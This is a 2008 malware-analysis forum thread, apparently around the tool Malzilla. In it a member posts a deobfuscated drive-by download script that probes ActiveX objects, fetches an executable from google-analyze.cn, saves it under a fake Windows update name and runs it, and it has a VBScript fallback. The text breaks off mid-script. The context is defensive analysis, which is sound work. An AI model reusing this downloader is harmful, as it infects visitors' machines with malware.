Same here :( (confirmed on XP SP2 and SP3)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

September 02, 2008, 04:04:47 am
Reply #189

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Which option do you use for eval() (replace, override, leave as is)?
It works fine for me here with "leave as is".
Do you have enough free space on the partition, as this script requires a lot of free space (>100 MB)?
Is the "eval_temp" folder present in Malzilla's folder?

September 02, 2008, 04:05:56 am
Reply #190

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Here is the script after deobfuscation:
Code:
var url='http://google-analyze.cn/getexe.exe?o=2&t=1220309190&i=1365934880&e=';
var success=0;
var exeurl=url+'1';
function CreateO(o,n){
var r=null;
try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,"")}catch(e){}}
if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}
if(!r){try{r=o.GetObject("",n)}catch(e){}}
if(!r){try{r=o.GetObject(n,"")}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return(r);
}
var repl=new Array("-","ip","il","te","je","el","ca","ec","ol","os","LH","SX","ve","DO","re","od","pe","it","cl");
function Go(a){
var fso=a.CreateObject("Scr"+repl[1]+"ting.F"+repl[2]+"eSys"+repl[3]+"mOb"+repl[4]+"ct","")
var sap=CreateO(a,"Sh"+repl[5]+"l.Appli"+repl[6]+"tion");
var nl=null;
fname="KB908845.exe";
fname=eval("fso.Bu"+repl[2]+"dPath(fso.GetSp"+repl[7]+"ialF"+repl[8]+"der(2),fname)");
try{nl=CreateO(a,"Micr"+repl[9]+"oft.XM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=CreateO(a,"M"+repl[11]+"ML2.XM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=CreateO(a,"M"+repl[11]+"ML2.Ser"+repl[12]+"rXM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=new XMLHttpRequest();nl.open("GET",exeurl,false);}
catch(e){return 0;}}}}
nl.send(null);
rb=nl.responseBody;
var x=CreateO(a,"A"+repl[13]+"DB.St"+repl[14]+"am");
x.Type=1;
eval("x.M"+repl[15]+"e=3;x.O"+repl[16]+"n();x.Wr"+repl[17]+"e(rb);x.Sa"+repl[12]+"Tof"+repl[2]+"e(fname,2);sap.Sh"+repl[5]+"lEx"+repl[7]+"ute(fname);");
return 1;
}
function mdac(){
var i=0;
var target=new Array("BD96C556"+repl[0]+"65A3-11D0-983A-00C04FC29E36","AB9BCEDD"+repl[0]+"EC7E-47E1-9322-D4A210617116","0006F033"+repl[0]+"0000-0000-C000-000000000046","0006F03A"+repl[0]+"0000-0000-C000-000000000046","6e32070a"+repl[0]+"766d-4ee6-879c-dc1fa91d2fc3","6414512B"+repl[0]+"B978-451D-A0D8-FCFDF33E833C","7F5B7F63"+repl[0]+"F06F-4331-8A26-339E03C0AE3D","06723E09"+repl[0]+"F4C2-43c8-8358-09FCD1DB0766","639F725F"+repl[0]+"1B2D-4831-A9FD-874847682010","BA018599"+repl[0]+"1DB3-44f9-83B4-461454C84BF8","D0C07D56"+repl[0]+"7C69-43F1-B4A0-25F5A11FAB19","E8CCCDDF"+repl[0]+"CA28-496b-B050-6C07C962476B",null);
while(target[i]){
var a=null;
a=document.createElement("object");
a.setAttribute(repl[18]+"assid",repl[18]+"sid:"+target[i]);
if(a){try{var b=CreateO(a,"Sh"+repl[5]+"l.Appli"+repl[6]+"tion");if(b){if(Go(a))return 1;}}catch(e){}}
i++;
}
}
if(mdac()) success=1;
if(!success){
document.write("<script language=VBScript>\r\n"+
'Set elem=document.createElement("ob'+repl[4]+'ct")'+"\r\n"+
'fname="KB908518.exe"'+"\r\n"+
'elem.setAttribute "id","elem"'+"\r\n"+
'elem.setAttribute "'+repl[18]+'assid","'+repl[18]+'sid:BD96C556'+repl[0]+'65A3-11D0-983A-00C04FC29E36"'+"\r\n"+
'Set obj=elem.CreateObject("Sh'+repl[5]+'l.Appli'+repl[6]+'tion","")'+"\r\n"+
"Set nsp=obj.NameSpace(20)\r\n"+
'Set pnm=nsp.ParseName("Symbol.ttf")'+"\r\n"+
'tmp=Split(pnm.Path,"\\",-1,1)'+"\r\n"+
'path=tmp(0) & "\\" &  tmp(1) & "\\"'+"\r\n"+
"fname=path & fname\r\n"+
'set tpqpd=CreateObject("Micr'+repl[9]+'oft.XM'+repl[10]+'TTP")'+"\r\n"+
'iiqu=tpqpd.Open("GET",exeurl,0)'+"\r\n"+
"tpqpd.Send()\r\n"+
"On Error Resume Next\r\n"+
"egsyho=tpqpd.responseBody\r\n"+
'Set acvqqrp=elem.CreateObject("Scr'+repl[1]+'ting.F'+repl[2]+'eSys'+repl[3]+'mOb'+repl[4]+'ct","")'+"\r\n"+
"Set kld=acvqqrp.CreateTextFile(fname, TRUE)\r\n"+
"lotzom=LenB(egsyho)\r\n"+
"For j=1 To lotzom\r\n"+
"plkosl=MidB(egsyho,j,1)\r\n"+
"qamplxd=AscB(plkosl)\r\n"+
"kld.Write(Chr(qamplxd))\r\n"+
"Next\r\n"+
"kld.Close\r\n"+
'Set yipt=elem.CreateObject("WScr'+repl[1]+'t.Sh'+repl[5]+'l","")'+"\r\n"+
"On Error Resume Next\r\n"+
"yipt.R"+repl[19]+" fname,1,FALSE\r\n"+
'<\/script>');
}

if(!success){
exeurl=url+'9';
document.write('<object classid="clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5" id="test"></object>');
try{test.DownloadFile(exeurl,"..\\~tmp0001.exe","0","0");document.location